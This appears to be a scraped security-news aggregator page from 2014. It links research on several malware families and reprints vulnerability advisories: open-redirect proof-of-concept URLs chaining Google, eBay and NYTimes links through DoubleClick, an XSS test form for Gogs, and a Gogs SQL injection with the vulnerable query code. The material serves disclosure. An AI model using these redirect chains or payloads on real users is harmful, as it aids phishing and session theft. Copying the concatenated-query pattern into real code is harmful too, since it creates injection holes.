Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Observing the Havex RAT

$
0
0
It has, so far, been publicly reported that three ICS vendors have spread the Havex Remote-Access-Tool (RAT) as part of their official downloads. We've covered the six pieces of software from these three vendors in our blog post ”Full Disclosure of Havex Trojans”. In this blog post we proceed by analyzing network traffic generated by Havex.

more here........http://www.netresec.com/?page=Blog&month=2014-11&post=Observing-the-Havex-RAT

Evolution of Upatre Trojan Downloader

$
0
0
Upatre is a Trojan Downloader family that once installed, is responsible for stealing information and downloading additional malware on the victim machine. It typically arrives via spammed e-mail messages from the Cutwail Botnet, either as an attachment, or via a URL pointing to a remote hosting site. We are also seeing Exploit Kits being used as a vector for Upatre infections in the wild.

more here......http://research.zscaler.com/2014/11/evolution-of-upatre-trojan-downloader.html

Oil Droplets and Your Banking Credentials

$
0
0
What does a droplet of oil have in common with the security of your banking credentials? Very little, you might think. However, there is research that came out a few months back, that confirms a theory made (and then dismissed) over 80 years ago about quantum effects. Bear with me.

more here........http://blog.whitehatsec.com/oil-droplets-and-your-banking-credentials/

Cloud Key Management vs. Hardware-Based Key Managers (HSMs)

$
0
0
Cloud security is a top concern for any organization migrating to the cloud. The threats are many.
For example, the fact your data resides in a shared, multi-tenant environment is a threat that has become a reality with the latest Xen virtualization bug, which allowed a malicious fully virtualized server to read data about other virtualized systems running on the same physical hardware or the hypervisor).
Other threats to cloud security include internal employees and even governments.

more here............http://www.porticor.com/2014/11/cloud-key-management-vs-hardware-based-key-managers-hsms/

Automating Man-in-the-Middle SSHv2 attacks

$
0
0
Recently during an internal penetration test, I was performing ARP spoofing and i discovered a SSH connection from the administrator computer to another box.

That sounds like the correct way to access remote hosts securely. However, the problem was that the company was using a network switch that was vulnerable to ARP spoofing.

more here.........http://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/

Paper: Measuring the Leakage of Onion at the Root

$
0
0
“A measurement of Tor’s .onion pseudo-TLD in the global domain name system”
The Tor project provides individuals with a mechanism of communicating anonymously on the Internet. Furthermore, Tor is capable of providing anonymity to servers, which are configured to receive inbound connections only through Tor---more commonly called hidden services. In order to route requests to these hidden services, a namespace is used to identify the resolution requests to such services. A namespace under a non-delegated (pseudo) top-level-domain (TLD) of .onion was elected. Although the Tor system was designed to prevent .onion requests from leaking into the global DNS resolution process, numerous requests are still observed in the global DNS. In this paper we will present the state of .onion requests received at the global public DNS A and J root nodes over a longitudinal period of time, a synthesis of Day In The Life of the Internet (DITL) data repository, and potential explanations of the leakage, and highlights of trends associated with global censorship events. By sharing this preliminary work, we wish to trigger further discussions on the matter in the community.

more here...........http://delivery.acm.org/10.1145/2670000/2665951/p173-thomas.pdf?ip=74.65.254.23&id=2665951&acc=OPEN&key=4D4702B0C3E38B35%2E4D4702B0C3E38B35%2E4D4702B0C3E38B35%2E6D218144511F3437&CFID=598741558&CFTOKEN=56195266&__acm__=1415901012_29baab4a3cea21984f145fb5587bc92a

OnionDuke: APT Attacks Via the Tor Network

$
0
0
Recently, research was published identifying a Tor exit node, located in Russia, that was consistently and maliciously modifying any uncompressed Windows executables downloaded through it. Naturally this piqued our interest, so we decided to peer down the rabbit hole. Suffice to say, the hole was a lot deeper than we expected!

more here..........http://www.f-secure.com/weblog/archives/00002764.html

Simple guest to host VM escape for Parallels Desktop

$
0
0
This is a little story about exploiting guest to host VM escape not-a-vulnerability in Parallels Desktop 10 for Mac. Discovered attack is not about some serious hardcore stuff like hypervisor bugs or low-level vulnerabilities in guest-host communication interfaces, it can be easily performed even by very lame Windows malware if your virtual machine has insecure settings.

more here......http://blog.cr4.sh/2014/11/simple-guest-to-host-vm-escape-for.html

Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities Can be Used by Spammers

$
0
0
Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities
Can be Used by Spammers



Although Google does not include Open Redirect vulnerabilities in its bug
bounty program, its preventive measures against Open Redirect attacks have
been quite thorough and effective to date.

However, Google might have overlooked the security of its DoubleClick.net
<http://doubleclick.net/> ​advertising system. After some test, it is found
that most of the redirection URLs within DoubleClick.net
<http://doubleclick.net/> are vulnerable to Open Redirect vulnerabilities.
Many redirection are likely to be affected.

These redirections can be easily used by spammers, too.

Some URLs belong to Googleads.g.Doubleclick.net
<http://googleads.g.doubleclick.net/> are vulnerable to Open Redirect
attacks, too. While Google prevents similar URL redirections other than
Googleads.g.Doubleclick.net <http://googleads.g.doubleclick.net/>. Attackers
can use URLs related to Google Account to make the attacks more powerful.

Moreover, these vulnerabilities can be used to attack other companies such
as Google, eBay, The New York Times, e.g. by bypassing their Open Redirect
filters(Covert Redirect).




*(1) Background Related to Google DoubleClick.net.*



*(1.1) What is DoubleClick.net?*

"DoubleClick is the ad technology foundation to create, transact, and
manage digital advertising for the world's buyers, creators and sellers."
http://www.google.com.sg/doubleclick/



*(1.2) Reports Related to Google DoubleClick.net Used by Spammers*


*(1.2.1)*

Google DoublClick.net has been used by spammers for long time. The
following is a report in 2008.

"The open redirect had become popular with spammers trying to lure users
into clicking their links, as they could be made to look like safe URLs
within Google's domain."
https://www.virusbtn.com/blog/2008/06_03a.xml?comments


*(1.2.2)*

Mitechmate published a blog related to DoubleClick.net spams in 2014.

"Ad.doubleclick.net <http://ad.doubleclick.net/> is recognized as a
perilous adware application that causes unwanted redirections when surfing
on the certain webpages. Actually it is another browser hijacker that aims
to distribute frauds to make money.Commonly people pick up Ad.doubleclick
virus when download softwares, browse porn site or read spam email
attachments. It enters into computer sneakily after using computer
insecurely.Ad.doubleclick.net <http://insecurely.ad.doubleclick.net/> is
not just annoying, this malware traces users’ personal information, which
would be utilized for cyber criminal."
http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/


*(1.2.3)*

Malwarebytes posted a news related to DoubleClick.net malvertising in 2014.

"Large malvertising campaign under way involving DoubleClick and Zedo"
https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/




*(2) DoubleClick.net System URL Redirection Vulnerabilities Details.*

These vulnerabilities can be attacked without user login. Tests were
performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.

Used webpages for the following tests. The webpage address is "
http://www.tetraph.com/security". We can suppose that this webpage is
malicious.



*(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net
<http://googleads.g.doubleclick.net/>.*


*(2.1.1)*

Some URLs belong to googleads.g.doubleclick.net are vulnerable to Open
Redirect attacks. While Google prevents similar URL redirection other than
googleads.g.doubleclick.net.


Vulnerable URLs:
http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo

http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://economics.wj.com


POC:
http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security

http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security


Attackers can make use of the following URLs to make the attacks more
powerful, i.e.
https://www.google.com/accounts/ServiceLogin?continue=https%3A%2F%2Fsites.google.com%2Fsite%2Fissrabhi%2Fhome&service=jotspot&passive=true&ul=1

https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fwww.orkut.com%2FRedirLogin%3Fmsg%3D1%26auth%3D*


POC:
https://www.google.com/accounts/ServiceLogin?continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessaybeans%2Freflections%2Fsolitude.html

https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.diebiyi.com%2Farticles


*(2.1.2)*

While Google prevents similar URL redirection other than
googleads.g.doubleclick.net , e.g.

http://www.googleadservices.com/pagead/aclk?sa=L&ai=C8u9OibgEU_XIOKrNswfrzYDgAY2FhfgE1aLjnoYB-7qSCxADILhPKANQrt2khP3_____AWC_BaAB8-vV0gPIAQGqBChP0AshNp656okgv3tSxmgc3JZeuS25cM0HlW9wUqHwxL8nk75mFPqsgAf1k6otkAcB&num=3&val=ChA2MWI5ODZkYzA4MTlmZmRlEN-mlZgFGgghk-txLb-9bSABKAAwhPDs-dD_xPHhATj6w5KYBUD6w5KYBQ&sig=AOD64_2f3wWGlepm4KMYlixE15qmjC1FGw&adurl=http://freshservice.com/free-service-desk/

http://www.googleadservices.com/pagead/aclk?sa=L&ai=C6w2J2VL1UtqeFtPFsQe_xICACOur9I0Gm4qOwXKd4q7LvAEQAiC4TygCUPrp_p7______wFgvwWgAY2TjcoDyAEBqQJGONe13HWqPqoEIk_QksMhB61R5_EBc-rRl0G3mUtOQjLemb4NjAETa6dj-AGAB9vs8jWQBwE&num=2&val=ChA5MDRhYzc4NjJiNjFlMzZlEO6g15cFGgjqLoQCBAXi2SABKAAw6sfV44GF7cZ_OMbI1ZcFQMbI1ZcF&sig=AOD64_1g--5hg2Tc0L5irweEKYqbh1FwSw&adurl=https://www.singtelshop.com/mobile/phone-details.jsf%3FbrandId%3D122%26modelId%3DZ10



*(2.2) Vulnerable URLs Related to DoubleClick.net.*

Vulnerable URLs 1:
http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml

http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://noteok.zdnet.com.cn/notebook/2013/1113/2995493.shtml


POC:
http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.inzeed.com/kaleidoscope/

http://ad.doubleclick.net/click;h=v2%7C4133%7C0%7C0%7C%2a%7Cl;276061443;0-0;0;103152519;31-1%7C1;55814388%7C55703677%7C1;;%3fhttp://www.tetraph.com/security



Vulnerable URLs 2:
http://ad.doubleclick.net/clk;275260754;102106837;b?http://zerodistance.cio.com

http://ad.doubleclick.net/clk;276304929;103445101;w?http://tracker.marinsm.com/rd


POC:
http://ad.doubleclick.net/clk;275260754;102106837;b?http://www.inzeed.com/kaleidoscope/

http://ad.doubleclick.net/clk;276304929;103445101;w?http://www.tetraph.com/security



Vulnerable URLs 3:
http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http%3A%2F%2Fib.adnxs.com

http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http%3A%2F%2Fwww.reuters.com%


POC:
http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward=http://www.inzeed.com/kaleidoscope/

http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward=http://www.tetraph.com/security



...



We can see that Google DoubleClick.net has Open Redirect vulnerabilities
and could be misused by spammers.



*(2.3)*

POC Video:
https://www.youtube.com/watch?v=lfKHVGHWvk8&feature=youtu.be




*(3) Google DoubleClick.net Can Adversely Affect Other Websites.*

At the same time, Google DoubleClick.net can be used to do "Covert
Redirect" to other websites, such as Google, eBay, The New York Times,
etc.(Bypass other websites' Open Redirect filters)



*(3.1)*

Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net
<http://googleads.g.doubleclick.net/>

Vulnerable URL:
https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/

POC:
https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fsecurity


More Details:

Video:
https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be

Blog:
http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html



*(3.2)*

eBay Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net
<http://googleads.g.doubleclick.net/>

Vulnerable URL:
http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/

POC:
http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV%26num=0%26sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ%26client=ca-pub-0466582109566532%26adurl=http://www.tetraph.com/security


More Details:

Video:
https://www.youtube.com/watch?v=a4H-u17Y9ks

Blog:
http://tetraph.blogspot.com/2014/11/ebay-covert-redirect-vulnerability.html



*(3.3)*

The New York Times (Nytimes.com) Covert Redirect Vulnerability Based on
Google Doubleclick.net

Vulnerable URL:
http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ffacebook%2Ecom%2Fall%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion

POC:
http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ftetraph%2Ecom%2Fsecurity%3F%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion


More Details:

Video:
https://www.youtube.com/watch?v=3XtrUqzxNW0

Blog:
http://computerobsess.blogspot.com/2014/11/nytimes-covert-redirect-vulnerability.html




These vulnerabilities were reported to Google earlier in 2014. But it seems
that Google has yet taken any actions. All of the vulnerabilities are still
unpatched.




Reporter:
Wang Jing, Mathematics, Nanyang Technological University
http://www.tetraph.com/wangjing




More Details:
http://tetraph.com/security/open-redirect/google-doubleclick-netadvertising-system-url-redirection-vulnerabilities-can-be-used-by-spammers/

Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net

$
0
0
Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net
<http://googleads.g.doubleclick.net/>
-- Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net
<http://googleads.g.doubleclick.net/>



The vulnerability exists at "Logout?" page with "&continue" parameter, i.e.
https://www.google.com/accounts/Logout?service=writely&continue=https://googleads.g.doubleclick.net



The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.



(1) When a user is redirected from Google to another site, Google will
check whether the redirected URL belongs to domains in Google's whitelist
(The whitelist usually contains websites belong to Google), e.g.
docs.google.com
googleads.g.doubleclick.net



If this is true, the redirection will be allowed.

However, if the URLs in a redirected domain have open URL redirection
 vulnerabilities themselves, a user could be redirected from Google to a
vulnerable URL in that domain first and later be redirected from this
vulnerable site to a malicious site. This is as if being redirected from
Google directly.

One of the vulnerable domain is,
googleads.g.doubleclick.net (Google's Ad System)




(2) Use one webpage for the following tests. The webpage address is "
http://www.inzeed.com/kaleidoscope". We can suppose that this webpage is
malicious.



Vulnerable URL:
https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/



POC:
https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.inzeed.com%2Fkaleidoscope



POC Video:
https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be



Reporter:
Wang Jing, Mathematics, Nanyang Technological University
http://www.tetraph.com/wangjing





More Details:
http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html

CVE-2014-7290 Atlas Systems Aeon XSS (Cross-Site Scripting) Vulnerability

$
0
0
CVE-2014-7290  Atlas Systems Aeon XSS (Cross-Site Scripting) Vulnerability


Exploit Title: Atlas Systems Aeon XSS Vulnerability
Product: Aeon
Vendor: Atlas Systems
Vulnerable Versions: 3.6 3.5
Tested Version: 3.6
Advisory Publication: Nov 12, 2014
Latest Update: Nov 12, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7290
Solution Status: Fixed by Vendor
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





Advisory Details:

(1) Aeon

Aeon is special collections circulation and workflow automation software
for your special collections library designed by special collections
librarians.

Aeon improves customer service and staff efficiency while providing
unparalleled item tracking, security and statistics.



(2) However, it is vulnerable to XSS Attacks.

(2.1) The first vulnerability occurs at "aeon.dll?" page, with "&Action"
parameter.
(2.2) The second vulnerability occurs at "aeon.dll?" page, with "&Form"
parameter.




Solutions:
2014-09-01: Report vulnerability to Vendor
2014-10-05: Vendor replied with thanks and vendor will change the source
code





References:
http://tetraph.com/security/xss-vulnerability/cve-2014-7290-atlas-systems-aeon-xss-cross-site-scripting-vulnerability/
https://prometheus.atlas-sys.com/display/aeon/Aeon+3.6+Release+Notes
http://cwe.mitre.org
http://cve.mitre.org/

CVE-2014-8683 XSS in Gogs Markdown Renderer

$
0
0
XSS in Gogs Markdown Renderer
=============================
Researcher: Timo Schmid <tschmid@ernw.de>


Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
 from [1])

It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
 unauthorized users.

Gogs provides two api views to transform markdown into HTML at the urls
/api/v1/markdown and /api/v1/markdown/raw

The transformation is vulnerable to XSS.


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


CVSS Base Score
===============
4.3 (AV:N / AC:M / Au:N / C:P / I:N / A:N)


CVE-ID
======
CVE-2014-8683


Impact
======
The vulnerability could be used together with social engineering attacks
to gain
access to restricted resources by extracting authentication tokens from
cookies
or by executing commands in the context of the logged in victim.


Status
======
Not fixed


Vulnerable Code Section
=======================
models/issue.go:
[...]
func RenderMarkdown(rawBytes []byte, urlPrefix string) []byte {
    body := RenderSpecialLink(rawBytes, urlPrefix)
    body = RenderRawMarkdown(body, urlPrefix)
    return body
}

func RenderMarkdownString(raw, urlPrefix string) string {
    return string(RenderMarkdown([]byte(raw), urlPrefix))
}
[...]


Proof of Concept
================
Form to trigger XSS:
<form action="http://example.com/api/v1/markdown" method="post">
<input name="text" value="&lt;img
onerror=&quot;alert(&amp;quot;XSS&amp;quot;)
&quot; src=&quot;x&quot;&gt;">
<input type="submit">
</form>

Response:
<p><img onerror="alert(&quot;XSS&quot;)" src="x"></p>


Solution
========
The markdown processing should reject or filter any HTML input and
process only
markdown content.


Affected Versions
=================
>= v0.3.1-9-g49dc57e


Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-14: CVE-ID assigned


Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>


References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3] https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
[4] https://www.ernw.de/download/BC-1404.txt


Advisory-ID
===========
BC-1404


Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

- --
Timo Schmid

ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0

Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey

==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
==================   TROOPERS15   ==================
*   International IT Security Conference & Workshops
*   16th - 20st March 2015 / Heidelberg, Germany
*   www.troopers.de
====================================================

CVE-2014-8682 Multiple Unauthenticated SQL Injections in Gogs

$
0
0
Unauthenticated SQL Injection in Gogs repository search
=======================================================
Researcher: Timo Schmid <tschmid@ernw.de>


Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
 from [1])

It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
 unauthorized users.

Gogs provides an api view to give javascript code the possibility to
search for
existing repositories in the system. This view is accessible at
/api/v1/repos/search?q=<search query>.

The q Parameter of this view is vulnerable to SQL injection.


Exploitation Technique
======================
Remote


Severity Level
==============
Critical


CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)


CVE-ID
======
CVE-2014-8682

Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.


Status
======
Fixed by Vendor


Vulnerable Code Section
=======================
models/repo.go:
[...]
// SearchRepositoryByName returns given number of repositories whose name
contains keyword.
func SearchRepositoryByName(opt SearchOption) (repos []*Repository, err
error) {
    // Prevent SQL inject.
    opt.Keyword = FilterSQLInject(opt.Keyword)
    if len(opt.Keyword) == 0 {
        return repos, nil
    }
    opt.Keyword = strings.ToLower(opt.Keyword)

    repos = make([]*Repository, 0, opt.Limit)

    // Append conditions.
    sess := x.Limit(opt.Limit)
    if opt.Uid > 0 {
        sess.Where("owner_id=?", opt.Uid)
    }
    if !opt.Private {
        sess.And("is_private=false")
    }
    sess.And("lower_name like '%" + opt.Keyword + "%'").Find(&repos)
    return repos, err
}
[...]

The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. Because of the SQL filter at the method entry, attackers
can't use spaces (0x20) and since v0.5.6.1025-g83283b commas are also
filtered.


